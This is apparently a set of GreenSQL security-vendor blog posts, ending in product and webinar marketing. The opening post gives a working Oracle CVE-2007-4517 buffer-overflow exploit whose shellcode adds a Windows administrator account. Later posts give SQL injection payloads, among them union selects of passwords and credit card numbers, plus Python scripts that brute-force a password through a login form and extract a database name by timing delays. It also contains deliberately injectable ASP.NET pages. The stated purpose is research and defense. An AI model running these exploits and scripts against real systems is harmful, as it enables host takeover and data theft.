As part of GreenSQL’s Database security research,  we’ve been validating and extending coverage of known and unknown vulnerabilities in order to increase GreenSQL product security, at this post we will reveal a full working Prove of Concept for the CVE-2007-4517 vulnerability which executes arbitrary code.

The Exploit: PL/SQL/2007-4517 exploit is a PL/SQL procedure that exploits the CVE-2007-4517 vulnerability, also known as Oracle Database XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA Procedure Multiple Argument Remote Overflow.

The vulnerability is caused due to a boundary error in the XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA procedure when processing the OWNER and NAME arguments to create an SQL query.

This can be exploited to cause a buffer overflow by passing overly long OWNER and NAME arguments to the affected procedure.

Symptoms

System Changes:
•    New administrative user account.
(Username: GreenSQL, Password:GreenSQL)
•    OracleServiceXE service turns off.

Technical Information
The exploits has been tested on:
• Windows XP Professional SP3.
• Oracle Database 10g Express Edition.

All the known exploits and POC’s developed for this vulnerability so far are Denial-of-Service exploits.

This is a New exploit that actually executes arbitrary code and adds a new user account to the database host operating system.

The Exploit

The PL/SQL procedure calls to the xDb.XDB_PITRIG_PKG.PITRIG_DROPMETADATA() function with two arguments:
1. “123”.
2. Buffer (2305 bytes)

The buffer consists of payload, jmp instructions, arithmetic instructions and garbage.

When executing the code, the EBX contains the starting address of the buffer + 0x7A5.

In order to execute the payload in the buffer, the following steps needs to be performed:
1. The EIP should point to an address contains the jmp EBX instruction.
2. At the [EBX] address, the exploit needs to jmp -0x7A5 to the start of the buffer.

Jumping to EBX
In order to jump to the address in the EBX register, the EIP should be set to 0x 095F7160.

Jumping to the Payload
In order to execute the payload, the following instructions needs to be performed:
sub ebx, 0x7a5
jmp ebx

The opcodes of the first instruction are:
0×81, 0xEB, 0xA5, 0×07, 0×00, 0×00.
One of the limitations of HEXTORAW() function, is that it’s not able to deal with 0×00 characters.
Because of that reason, instead of using the sub ebx, 0x7a5 instruction, the following instructions need to be performed:
sub bl,0xb0
add bh,0xfa
jmp ebx

Which are equivalent to:
sub ebx, 0x5b0
jmp ebx

Which is equivalent to jmp ebx-0x5b0.

The opcodes of those instructions are:
0×80, 0xEB, 0xB0, 0×80, 0xC7, 0xFA, 0xFF, 0xE3, which are able to be processed by the HEXTORAW() function.

The Payload

The payload’s size is 308 bytes (of 0x7A5-0x5B0 = 0x1F5 = 501 payload’s space)

The payload creates a new user account, called “GreenSQL”, with the password “GreenSQL”.
After creating the user account, it adds the user to the “Administrators” group.

The exploit code is available below.

Conclusions

It’s extremely important to make sure that you have updated your Database with the latest patches and security updates the database vendor has released, this prove of concept shows how it’s possible to gain control over your database host operating system using older vulnerability, which with extended research can be transformed to a new exploit.

Database security solutions, like GreenSQL, provides additional layer of defense against known and unknown attacks.

The Exploit POC

#################################################
## GreenSQL   ########    Proof-of-Concept     ##
## This code is for educational purposes only  ##
#################################################
declare
 sc varchar2(32767);
 junk varchar2(32767);
 junk2 varchar2(32767);
 EBX varchar2(32767);
 junk3 varchar2(32767);
 JMP2SC varchar2(32767);
 junk4 varchar2(32767);
 EIP varchar2(32767);
 junk5 varchar2(32767);
 begin
 junk:='@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@';
 sc:=UTL_RAW.CAST_TO_varchar2(HEXTORAW('d9c6bd60dd3d66d9742
 4f45b31c9b147316b18036b1883c3643fc89a8c36'));
 sc := sc || UTL_RAW.CAST_TO_varchar2(HEXTORAW('33634c29bd8
 67d7bd9c32f4ba986c320ff3250442834d1e30e7be2c58ed72047732a7
 4a74ae589a68b1861fa4456d3ebe12aef0a26214f7543f63bcf4a27934
 404df9803b5de4d5089a9fa'));
 sc := sc || UTL_RAW.CAST_TO_varchar2(HEXTORAW('a379282afa8
 21a1251bd929fabf9157fdef16502d9c114d86cd4bfabd73c417881b74
 d35c59051c80aab6e41ad7ce7118a58a3c2b3f909a5cc1af51a6950144
 f0b3b738e99413a90a1496df890c2e27f2d01478f6708ee072ed8b24ad
 136f07252b389814ab68ccecc'));
 sc := sc || UTL_RAW.CAST_TO_varchar2(HEXTORAW('2afd5fb94c5
 260e82e39fa3dd4b967623959470c20e9a7a5d974d56559057c030bba2
 f87f37bbd7291ed122c15d2bb8fe156e329cc768d5064573df4e7f6d16
 d9a975c027a29fa8f13c76b2390650ab737f8bf178f8e5a3d613cf5f15
 dedb44ddaf1'));
 junk2:='AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';
 EBX:=UTL_RAW.CAST_TO_varchar2(HEXTORAW('EB10')) || 'CCCCC';
 junk3:= 'EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE';
 JMP2SC:=UTL_RAW.CAST_TO_varchar2(HEXTORAW('80EBB080C7FAFFE3'));
 junk4:='@@@@@@@@@@@@@@@@@@@@@@@@';
 EIP:= UTL_RAW.CAST_TO_varchar2(HEXTORAW('095f7160095f7160095f71
 60095f7160095f7160095f7160095f7160095f7160095f7160')); -- jmp EBX
 junk5:='CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
 CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
 CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
 CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC';
 xDb.XDB_PITRIG_PKG.PITRIG_DROPMETADATA('123', junk||sc||junk2||EBX
 ||junk3||JMP2SC||junk4||EIP||junk5);
 end;

Overview
=======

In order to get the system date in Oracle, you able to query for sysdate field in table dual.
SQL> select sysdate from dual;
SYSDATE
————–
15-SEP-11

SYSDATE format is set in: nls_date_format.

Following the publication: Lateral SQL Injection: A New Class of Vulnerability in Oracle, (http://www.databasesecurity.com/dbsec/lateral-sql-injection.pdf) published by David Litchfield, FEB/2008.

This post provides an overview and a demonstration on how this issue is still easily exploitable in Oracle Database.

Vulnerability
=========

Nls_date_format allows input of any string without filtering.
Example:  alter session set nls_date_format = ‘”the time is:”… hh24:mi’

After running that command, the SYSDATE will return the constant sentence “the time is…” and the [hours]:[minutes] (note that the hours are in 24 hours format).

SQL> select sysdate from dual;

SYSDATE
————–
the time is:… 14:27

By manipulating this “feature”, the user can manipulate PL/SQL procedures which base on SYSDATE.
In example, take a look on the following PL/SQL procedure:

create or replace procedure date_proc is
stmt varchar2(200);
v_date date:=sysdate;
begin
stmt:=‘select object_name from all_objects where created = ”’ || v_date ||””;
dbms_output.enable;
dbms_output.put_line(stmt);
execute immediate stmt;
end;

The procedure set the variable v_date and set it as SYSDATE.

After setting v_date, the procedure sets stmt as “select object_name from all_objedcts where created = ‘[v_date]’;, which returns the names of all objects that created at the date specified in v_date.
Note that to run and get dbms_output, you need to set serveroutput on before executing the procedure.

Example: select object_name from all_objects where created = ’15-SEP-11′;

Exploitation
==========
An attacker can manipulate that procedure by setting nls_date_format to ‘ or 1=1–.

alter session set nls_date_format = ‘”” or 1=1–”‘;

In this case, stmt will be:

select object_name from all_objects where created = ‘’ or 1=1–’;

Which will return all object_name in all_objects.

in addition, it is able to execute any SQL command, in example:
alter session set nls_date_format = ‘”” union select username from users–”‘;
alter session set nls_date_format = ‘”” union select password from users–”‘;
alter session set nls_date_format = ‘”” union select credit_card_number from clients–”‘;
etc..

Shortest SQL Injection Attack syntax

Overview
=======
In many cases, the user’s input is limited to a specific length.
Although the user’s input length is limited, many times the server is vulnerable to SQL Injection attack’s.
In this post, we’ll discuss two scenarios and how SQL injections attacks are being exploited using shortest SQL injection attack syntax.

Get Database Name through 2-fields attack
==============================
In this scenario, the attacker attacks a web application which receives First-Name and Last-Name, and outputs its matched e-mail address. (see appendix A)

The original SQL query sent to the database is:

select EmailAddress from Person.Contact where FirstName = ‘@fn’ and LastName = ‘@ln’; –where @fn and @ln are the user’s input.

In order to get the database name, the attacker can easily input the following string into one of the fields:

‘ union select db_name();–

That string’s length is 27 bytes.

If the user’s input length is limited to 15 bytes for each field, the previous attack will be blocked. Even though, the attacker can input the following strings to bypass the limitation:

•    First Name: ‘union select/* (15 bytes)
•    Last Name: */db_name();– (12 bytes)

The attack results the following query:

select EmailAddress from person.contact where FirstName = ”union select/*’ and LastName = ‘*/db_name()–’;

This will output the database name!

User Name and Password through 2-fields
=============================
In this scenario, the attacker attacks a web application which receives a username and a password, and outputs “Access Granted!” or “Access Denied!”. The web application limits user’s input to 20 bytes for each field. The web application validates only user’s input length. (see Appendix B)
The application sends the following query:

select count(*) from dbo.users where UserName = ‘@un’ and Password = ‘@pass’; –where @un and @pass are the user’s input

In order to brute-force the first character of david’s password, the attacker sends the strings:

•    User Name: david’and substring/*
•    Password: */(password,1,1)=’p

The attack results the following query:

select count(*) from dbo.users where UserName = ‘david’and substring/*’ and Password = ‘*/(password,1,1)=’p';

Return ‘1’ if the first character of the password is ‘p’ or ‘0’ in any different situation.
In order to brute-force david’s entire password, the attacker can use the following python script:

##################################################
##   GreenSQL 2-fields SQL Injection Attack     ##
##            Password Brute Forcer             ##
##              Proof-of-Concept                ##
##  This code is for educational purposes only  ##
##################################################

import urllib

un = 'david\'and substring/*'
i=0
CurrChr = 0
password = ""

for index in range(1,40):
    if CurrChr == 125:
        break
    for CurrChr in range(32,126):
        pswd = '*/(password,' + str(index) + ',1)=\'' + chr(CurrChr)
        args = {'UserName':un,'Password':pswd}
        encoded_args = urllib.urlencode(args)
        url = 'http://127.0.0.1:54213/WebSite1/Authentication.aspx'
        print "Sending: ", index, "X", chr(CurrChr)
        f = urllib.urlopen(url, encoded_args)
        contents = f.read()
        f.close()
        if (contents.find('Access Granted') != -1):
            password = password + chr(CurrChr)
            print "Password: ", password
            CurrChr =1
            break
         

        
        
Appendix A - Web Application #1 Source Code
===========================================

<%@ Page Language="C#" Debug="true" %>
  <%@ Import Namespace="System.Data" %>
  <%@ Import Namespace="System.Data.SqlClient" %>
  <html>
 <head><title>Shortest</title></head>
 
  <body>
  <form id = "f" method="post" action="shortest.aspx">
    First Name: <input name = "FirstName" type="text" maxlength="15" />(maxlength: 15) <br />
    Last Name: <input name = "LastName" type="text" maxlength="15"/>(maxlength: 15) <br />
    <input id="submit" type="submit" value="Get Email" />
  </form>
 
  <%
      string conn = "server=david-PC; uid=GreenSQL; pwd=GreenSQL; database=AdventureWorks; Connect Timeout=10000";
      DataSet ds = new DataSet();
      string fn = "";
      fn = Request.Form["FirstName"];
      string ln = "";
      ln = Request.Form["LastName"];
      if (fn.Length <= 15 && ln.Length <= 15)
      {
          string command = "select EmailAddress from person.contact where FirstName = '" + fn + "' and LastName = '" + ln + "';";
          SqlDataAdapter data = new SqlDataAdapter(command, conn);
          data.Fill(ds);

          Response.Write("<table>");
          foreach (DataRow row in ds.Tables[0].Rows)
          {
              Response.Write("<tr>");
              foreach (DataColumn col in ds.Tables[0].Columns)
              {
                  Response.Write("<th>");
                  Response.Write(row[col]);
                  Response.Write("</th>");
              }
              Response.Write("</tr>");
          }
          Response.Write("</table>");
          Response.Write(command);
          if (fn != null && ln != null)
              Response.Write("<br />FirstName: " + fn + "(" + fn.Length.ToString() + ")<br />LastName: " + ln + "(" + ln.Length.ToString() + ")<br />Total Length: " + (fn.Length + ln.Length).ToString());
      }
      else
      {
          Response.Write("Username and Passwords are limited to 15 characters maximum!");
      }
  %>
</body>
</html>

Appendix B – Web Application #2 Source Code
===========================================

<%@ Page Language="C#" Debug="true" %>
  <%@ Import Namespace="System.Data" %>
  <%@ Import Namespace="System.Data.SqlClient" %>
  <html>
 <head><title>Shortest</title></head>
 
  <body>
  <form id = "f" method="post" action="Authentication.aspx">
    Username: <input name = "UserName" type="text" maxlength="20" />(maxlength: 20) <br />
    Password: <input name = "Password" type="text" maxlength="20"/>(maxlength: 20) <br />
    <input id="submit" type="submit" value="Authenticate" />
  </form>
 
  <%
      string conn = "server=david-PC; uid=GreenSQL; pwd=GreenSQL; database=AdventureWorks; Connect Timeout=10000";
      DataSet ds = new DataSet();
      string un = "";
      un = Request.Form["Username"];
      string pass = "";
      pass = Request.Form["Password"];
      if (un.Length <= 20 && pass.Length <= 20)
      {
          string command = "select count(*) from dbo.users where UserName = '" + un + "' and Password = '" + pass + "';";
          SqlDataAdapter data = new SqlDataAdapter(command, conn);
          data.Fill(ds);

          Response.Write("<table>");
          foreach (DataRow row in ds.Tables[0].Rows)
          {
              Response.Write("<tr>");
              foreach (DataColumn col in ds.Tables[0].Columns)
              {
                  if (System.Convert.ToInt32(row[0]) > 0)

                      Response.Write("Access Granted!");

                  else
                      Response.Write("Access Denied!");
              }
              Response.Write("</tr>");
          }
          Response.Write("</table>");
          Response.Write(command);
          if (un != null && pass != null)
              Response.Write("<br />UserName: " + un + "(" + un.Length.ToString() + ")<br />Password: " + pass + "(" + pass.Length.ToString() + ")<br />Total Length: " + (un.Length + pass.Length).ToString());
      }
      else
      {
          Response.Write("Username and Passwords are limited to 15 characters maximum!");
      }
  %>
</body>
</html>

Time-Based Blind SQL Injection

 
Overview
=======
Blind SQL Injection is an attack which the attacker gets an indication for the query execution success. The attacker doesn’t get the query results.
Most of the time, the indication bases on server errors or customized application errors.

Time-Based Blind SQL Injection
======================
Sometimes the attacker might not be able to identify the query execution success, because the server/application doesn’t show any error.
One of the techniques to get an indication for the query execution success called Time-Based Blind SQL Injection.
With this technique, the attacker executes functions that take some time to finish (for example: Benchmark, Delay, etc.). By measuring the time took the application to response, the attacker might be able to identify if the query executed successfully or the query execution failed.

Discovering Database Details
====================
An attacker can export information from the database by using Time-Based Blind SQL Injection.
For example, an attacker can brute force the database’s name with this technique:
1.    Set the time before the query execution.
2.    Execute the following query:

declare @s varchar(100)
select @s = db_name()
if (ascii(substring(@s,1,1))) = 65
waitfor delay ’0:0:10′
else
waitfor delay ’0:0:2′

3.    Set the time after the query execution.
4.    Calculate time it took to the query to run,
4.1.    if it took 10 seconds, the first character of the database’s name is ‘A’ (ASCII 65)
4.2.    if it took 2 seconds, the first character of the database’s name if NOT ‘A’.

Database’s name brute-forcer (Proof-of-Concept in Python):
==========================================

Tested Environment

1.    Windows 7 64-bits.
2.    MSSQL Server 2008.
3.    Database: AdventureWorks, can be downloaded from: http://msftdbprodsamples.codeplex.com/releases/view/37109)
4.    SQL Server Configuration:
a.    TCP/IP – Enabled.
b.    Authentication Mode – Both SQL Server and Windows.
c.    SQL User:
i.    Name: GreenSQL
ii.    Password: GreenSQL
iii.    Server Roles: sysadmin
iv.    User Mapping: AdventureWorks

This code is for educational purposes only!

Python Source Code
===============

##################################################
##   GreenSQL Time-Based Blind SQL Injection    ##
##          Database Name Brute Forcer          ##
##              Proof-of-Concept                ##
##  This code is for educational purposes only  ##
##################################################

import pyodbc
import time
## Connect to the DB
cnxn = pyodbc.connect('DRIVER={SQL
Server};SERVER=localhost;DATABASE=AdventureWorks;UID=GreenSQL;PWD=GreenSQL')
cursor = cnxn.cursor()
## Set variables
DBName = ''
CurrChr = 0
FirstRun = int(time.time())
ASCIIRange = range(32,126)
## Discover DB Name (Brute Force)
for i in range(1,100):
if CurrChr == 125: ## if the last loop ended without a match,
break the loop
break
for CurrChr in ASCIIRange:
str(i)
print "Trying Char: " + chr(CurrChr) + " @ position: " +
print "DBName: " + DBName
query = 'declare @s varchar(100) '
query = query + 'select @s = db_name() '
query = query + 'if (ascii(substring(@s, '
query = query + str(i)
query = query + ', 1))) = '
query = query + str(CurrChr)
query = query + ' waitfor delay \'0:0:10\'' ##if the
current character matches, wait 10 seconds
query = query + 'else '
query = query + 'waitfor delay \'0:0:2\''
2 seconds
print query
StartTime = int(time.time()) ## Set the time before query
execution (UNIX Time)
cursor.execute(query)
EndTime = int(time.time())
execution (UNIX Time)
if EndTime-StartTime >= 10:
matches,
String
## Execute the query
## Set time after query
## if the current character
DBName = DBName + chr(CurrChr) ## add it to DBName
CurrChr = 1
break
## Print the findings and statistics
DoneTime = int(time.time())
print "DB Name: " + DBName
print "It took " + str(DoneTime - FirstRun) + "seconds!"

I would like to personally invite you to a GreenSQL Express Webinar,
I’ll be demonstrating GreenSQL Express, the free and simple way to keep your information private and safe.

On Wednesday, March 16th (just 2 weeks from now),
It’s called “How to Protect Sensitive Information in Minutes: Setting up GreenSQL Express with Basic Security Rules”

If you’re serious about protecting your data, you need to hear and see how it’s done. I’ll talk about:

1. Why you need a Database firewall / security solution
2. Where and How to install GreenSQL Express in your infrastructure
3. How to use GreenSQL Express to protect you database
4. How to create the security polices you need in minutes
5. How to protect your database from SQL injection attacks
6. How to implement a separation of duties in your database access
7. How to maintain business continuity with the Database Fallback feature
8. Q&A..

Again, this is happening online on Wednesday, March 16.
Use the link below to register and find the time in your time zone.

Register for a webinar, Click here to register:

Don’t miss it!

David

GreenSQL has just released a new document,

Microsoft SQL Server Security Best Practices :

http://www.greensql.com/content/sql-server-security-best-practices

“Cybercrime is encroaching more and more into the business space. Industrial espionage, spearphishing of important employees to breach network boundaries and mass theft of customer information are more diffcult to detect and have very serious consequences. At the same time, network boundaries are becoming ever more indistinct and porous as new technologies enable greater access from remote workers and mobile devices. In addition, legal requirements place greater emphasis on traceability and compliance with predefned standards of data hygiene.

Increasing amounts of sensitive data is stored, accessed and manipulated in databases connected to company websites as businesses increasingly interact with their customers through the Internet. As a result, it’s become as easy to access these databases as it is to access the main doors at corporate headquarters.

Security administrators face a constant battle to maintain usability, while preventing penetration from the outside and data loss from within. Alongside protecting network boundaries, businesses and website maintainers are under growing pressure to ensure that their web presence provides adequate protection for the users of its web services.”

As time passes, organizations realize that Web Application Firewalls (WAF) are not sufficient to secure their back end databases.

GreenSQL Express provides a free, commercial grade solution to protect MS-SQL, MySQL and PostgreSQL databases from known and unknown threats. GreenSQL Express includes:

- Database Intrusion Detection and Prevention System
- Database Firewall
- Separation of Duties
- Advanced Risk Scoring Matrix
- Database Front-end Security
- Real-time Database Protection

Get a free copy of GreenSQL Express at www.greensql.com


In this version, GreenSQL improvers the native support for PostgreSQL (http://www.postgresql.org) databases, improvers the native support for MySQL (http://www.mysql.com) databases and provides many Protocol and Network Optimizations. The Web Based GUI usability has been improved and many bugs been fixed.

GreenSQL community version 1.3.0 improvements and enhancements include:

1. Proxies dashboard: correctly displaying the proxy current status
2. Proxies automatic reloading fixes
3. Alerts include User IP Address
4. MySQL and PostgreSQL protocol fixes
5. Network optimizations
6. Alerts – redesign and graphics
7. Whitelist – redesign and graphics
8. It’s now possible to remove an alert
9. It’s now possible to move a whitelist back to alert
10. The footer was fixed

GreenSQL recently released its first commercial versions, GreenSQL Pro and GreenSQL Light, GreenSQL solutions are designed for small to large organizations assists to increase database security, performance and compliance.

With many new and exciting features, including but not limited to:

- Microsoft SQL Server (2000/2005/2008) support
- Full support for MySQL 4.x/5.x and PostgreSQL 7.x/8.x
- Database Caching (for all databases)
- Database SSL support (for all databases)
- Superior SQL Injection detection and prevention mechanism
- Brand new interface with full scale policy approach
- Database activity monitoring and Full Auditing (includes the before and after view of every change)
- Unparalleled performance and reliability
- Auto update service for the latest attack definitions updates
- Advanced Reporting, Logging and alerting
- Available for Windows and Linux installations (32 and 64 bit)

GreenSQL Pro is available for 30 days free evaluation at: https://portal.greensql.com/download

#1 Database security software

We are proud to announce that over 95,000 copies of GreenSQL have been downloaded internationally since its first release only 48 months ago – more downloads than any other database security vendor.

Thank you for your confidence in our software. Clearly, you have approved of our efforts and have been spreading the word about the GreenSQL database firewall.

GreenSQL official web site:
http://www.greensql.com

GreenSQL Community web site:
http://www.greensql.net

You can get the latest GreenSQL version from the following url:
https://portal.greensql.com/download

An application installation howto is available at:
http://www.greensql.net/howto

For any questions, ideas, and feedback, please join our support forum at:
http://www.greensql.net/forum

GreenSQL twitter:
http://twitter.com/greensql

Thanks,
The GreenSQL Team
http://www.greensql.com

“Commercial Unified Database Security solutions” is a mouthful. Let’s look at what that means.

For us, commercial has several meanings. First, we have designed GreenSQL Pro for commercial organizations; second, we charge a modest fee for it; and third, unlike our open source code, we take full responsibility for it.

How about unified? To be unified, something must first have parts. GreenSQL Pro and GreenSQL Light include many aspects of database security within them, all contributing to their primary mission: securing databases. We’ll be discussing some of those aspects below.

And of course, there’s database. GreenSQL Pro and GreenSQL Light protect MySQL, PostgreSQL and Microsoft SQL Server. As time goes on, we will undoubtedly expand the number of databases that they guard.

Unfortunately, the definition of security solution is a moving target. As long as there are black hats in the world, achieving security will require us to stay alert and responsive to new threats. We at GreenSQL stand guard on the front lines so that you, our users, can go about your businesses in a less stressful and more productive environment.

GreenSQL Light and GreenSQL Pro are security solutions that are simple to implement, effective in protecting your business information assets and will not break your budget.

Press Release on GreenSQL’s New Commercial Products

See what the rest of the world is reading about GreenSQL PRO and GreenSQL Light. http://www.greensql.com/press

The Cost of Database Breaches

Our groundbreaking news is even more significant in the context of the following numbers.

Studies by Verizon and the Ponemon Institute show that in 2008, 285 million records were breached at an average $202 per record cost. But according to a more recent Symantec study, when the records contained personally identifiable information, the cost soared to an astounding $11,000 per record!

With the cost of database breaches reaching such astronomical heights, securing databases has become essential for ensuring business survival.

GreenSQL Pro and Light Protect Microsoft SQL Server

Today, we are proud to announce that GreenSQL Pro and GreenSQL Light are able to secure Microsoft SQL Server databases from both accidental and malicious intrusions. This is a major milestone in our mission to protect the world’s databases from SQL injection attacks.

Microsoft SQL Server’s current market share stands at more than 20%.
It has made major inroads into small companies and into departments of larger ones. GreenSQL Pro and GreenSQL Light provide cost-effective solutions to legislative compliance and security needs.

Some GreenSQL Pro Features and Benefits

GreenSQL Pro has many excellent features – too many, in fact, to detail completely here. However, we would like to draw your attention to the following four.

Virtual patching. Virtual patching is a simple but powerful feature that immediately protects organization database servers against database application exploits even before patches are installed.

Because patch installation sometimes involves taking a database or server down for a period of time, organizations may choose to risk breach rather than incur downtime,  collecting patches and installing them as a group on a monthly, quarterly, or even annual basis.

Virtual patching enables organizations to eliminate the risk in this timing decision! As soon as we get the patch from the responsible party, we update the GreenSQL Pro database firewall with the signature of the specific exploit and we block it. Our clients’ copies of GreenSQL Pro are updated automatically without affecting their operations and their databases are immediately protected.

Caching. By recognizing query recurrence within various timeframes, GreenSQL’s proprietary, patented caching algorithm improves database performance in all configurations. In those that use many resources, such as audit functionality or reporting, it reduces latency; in others, it can actually improve database performance.

Auditing. GreenSQL Pro’s audit function has a finer granularity than even the leading enterprise level security leaders. It can differentiate between the last action and the update action.

Policy-based firewall. GreenSQL Pro is a policy-based firewall at a very deep level. For each of the three modes – learning mode, risk-based IDS/IPS mode, and firewall mode – a protection profile can be created by type of database, for a specific database (or many), and/or by table (or many). In addition, these policies can be enforced for any groups defined on a server.

Click hear to download GreenSQL Pro – Download

We are offering this comprehensive package of features for GreenSQL Light at an extremely affordable $147 per server per month for those making an annual commitment. A perpetual license for GreenSQL Pro can be purchased for only $3,997 per server.

And please note that a single instance of GreenSQL Pro installed as an appliance can secure multiple databases simultaneously. As you can see, we have made GreenSQL Pro not only effective, but very affordable.

A Thank You to Our Early Open Source Adopters

GreenSQL Pro was built on the foundation of our open source GreenSQL product. Our new product exists in great measure because you and tens of thousands of others adopted GreenSQL software for protecting your own databases and stuck with us through our growing pains. We would like you to reap the rewards of your belief in us.

As a special thank you for your thoughtful contributions, suggestions and ideas, we are offering you, our open source users, the opportunity to move to GreenSQL Pro & get a FREE 3 month extension to your GreenSQL Pro license.  - For your special benefit, contact us here.
Click hear to download GreenSQL Pro

For more information on GreenSQL Products and their features, benefits, and cost, please visit our new site www.greensql.com
We welcome your comments and any suggestions for new features or improvements.

GreenSQL twitter: twitter.com/greensql
Thanks,
The GreenSQL Team